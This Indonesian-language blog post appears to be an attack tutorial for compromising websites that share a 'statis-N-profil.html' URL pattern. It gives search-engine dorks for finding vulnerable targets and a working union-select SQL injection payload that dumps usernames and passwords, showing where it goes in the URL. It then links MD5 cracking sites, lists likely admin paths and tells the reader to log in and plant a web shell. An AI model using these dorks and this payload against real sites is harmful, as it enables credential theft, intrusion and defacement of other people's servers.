Siapkan Bahan - Bahannya:
1. Dork dasar:
1. Dork dasar:
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
Kembangin lagi dorknya biar dapet yg VULN + Perawan.
2. Exploit
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
3. MD5 Decrypter
Klik link dibawah ini untuk decrypter password md5-Nya.
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/
Tutorial:
1. Dorking pake dork di atas.
2. Pilih salah satu target. Salah dua juga gapapa :v
3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Contoh:
http://site.co.li/statis-1-profil.html
laluu tambahin exploit nya sesudah angka.
Jadinya gini:
http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
4. Kalau webnya vuln, di title atau judul web akan muncul username dan passwordnya
5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.
6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur
Kalau Admin pagenya sudah ditemukan masukkan akunnya.
7. Lalu Tanem shell
8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.
Saran saya, jangan langsung injek web nya. Cari dulu admin login nya.
0 komentar:
Post a Comment